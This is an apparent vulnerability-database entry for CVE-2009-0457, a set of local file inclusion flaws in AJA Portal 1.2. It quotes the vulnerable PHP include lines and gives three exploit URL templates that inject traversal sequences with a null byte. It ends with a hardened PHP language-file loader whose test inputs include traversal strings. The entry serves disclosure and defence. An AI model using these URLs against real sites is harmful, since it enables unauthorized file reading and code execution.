Magtrb AJA Portal Contact_Plus and Reviews modules local file inclusion vulnerabilities

Vulnerability ID: 1117328
Vulnerability type: Path traversal
Published: 2009-02-02
Updated: 2009-02-12
CVE ID: CVE-2009-0457
CNNVD-ID: CNNVD-200902-224
Platform: PHP
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/7939
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-224
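|Vulnerability details
AJA Portal is a content management system (CMS) for forum websites. AJA Portal version 1.2 contains multiple directory traversal vulnerabilities. A remote attacker can include and execute arbitrary local files by supplying directory traversal sequences in the currentlang parameter of the (1) Contact_Plus and (2) Reviews modules, and in the module_name parameter to admin/includes/FANCYNLOptions.php in the Fancy_NewsLetter module.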
|Exploit
-------------:multi local file include:------------
---------------
script:AJA 1.2
   
------------------------------------------------------------------
download from:http://www.magtrb.com/en/modules.php?name=Downloads&op=getit&lid=6
   
------------------------------------------------------------------

........................................................
vul1: \modules\Contact_Plus\admin\case.php line 14:

if (!stristr($_SERVER['SCRIPT_NAME'], "".$admin_file.".php")) { die ("Access Denied"); }
$module_name = "Contact_Plus";
include_once("modules/$module_name/admin/language/lang-".$currentlang.".php"); line 14

...............

vul2: /modules/Fancy_NewsLetter/admin/includes/FANCYNLOptions.php line 2:

require_once('modules/'.$module_name.'/admin/includes/Modules/Banners.php'); line2
...............

vul3: /modules/Reviews/admin/case.php line 14:

if (!eregi("".$admin_file.".php", $_SERVER['SCRIPT_NAME'])) { die ("Access Denied"); }
$module_name = "Reviews";
include_once("modules/$module_name/admin/language/lang-".$currentlang.".php"); line 14

-----------------------------------------------------
-----------------------------------------------------

xpl:

http://127.0.0.1/path/modules/Contact_Plus/admin/case.php?currentlang=[Lfi]%00

http://127.0.0.1/path/modules/Fancy_NewsLetter/admin/includes/FANCYNLOptions.php?module_name=[Lfi]%00

http://127.0.0.1/path/modules/Reviews/admin/case.php?currentlang=[Lfi]%00

***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]

from[iran-tehran]
---------------------------------------------------


# milw0rm.com [2009-02-02]
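
A hardened form of the `lang-$currentlang.php` include shown in the advisory above, as an added example that is not part of the original advisory or of AJA Portal. The helper name `resolve_lang_file()`, the `english` fallback and the demo directory are assumptions.

```php
<?php
// Added example (PHP 7.4+). resolve_lang_file() and the 'english' default are
// assumptions for illustration; they are not part of AJA Portal.
// $module must be a hard-coded literal at the call site, never request data.
function resolve_lang_file(string $base, string $module, string $lang,
                           string $default = 'english'): string
{
    $langDir = realpath("$base/modules/$module/admin/language");
    if ($langDir === false) {
        throw new RuntimeException('language directory missing');
    }
    // 1. Syntax check: a short token only. Rejects "/", "\", ".." and NUL
    //    bytes before the value touches any filesystem function.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $lang)) {
        $lang = $default;
    }
    // 2. Allowlist: the token must name a lang-*.php file that actually ships.
    $shipped = array_map(
        fn(string $p): string => substr(basename($p, '.php'), 5), // strip "lang-"
        glob($langDir . '/lang-*.php') ?: []
    );
    if (!in_array($lang, $shipped, true)) {
        $lang = $default;
    }
    // 3. Containment: the canonical path must still sit under $langDir.
    $path   = realpath("$langDir/lang-$lang.php");
    $prefix = $langDir . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException('no usable language file');
    }
    return $path;
}

// Constructed demo tree in the temp directory (not a real installation).
$base = sys_get_temp_dir() . '/aja_demo_' . bin2hex(random_bytes(4));
$dir  = "$base/modules/Contact_Plus/admin/language";
mkdir($dir, 0700, true);
foreach (['english', 'arabic'] as $l) {
    file_put_contents("$dir/lang-$l.php", "<?php // $l strings\n");
}

// Constructed inputs: one valid name, then values the checks must refuse.
foreach (['arabic', '../../secret', "english\0.txt", 'klingon'] as $in) {
    $file = resolve_lang_file($base, 'Contact_Plus', $in);
    printf("%-20s => %s\n", json_encode($in, JSON_UNESCAPED_SLASHES), basename($file));
}
// In case.php the call site would then be: include_once resolve_lang_file(...);
```

Only the first input selects `lang-arabic.php`; the other three fall back to `lang-english.php`.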
|References

Source: BID
Name: 33565
Link: http://www.securityfocus.com/bid/33565
Source: MILW0RM
Name: 7939
Link: http://www.milw0rm.com/exploits/7939
Source: SECUNIA
Name: 33735
Link: http://secunia.com/advisories/33735
Source: OSVDB
Name: 51709
Link: http://osvdb.org/51709
Source: OSVDB
Name: 51708
Link: http://osvdb.org/51708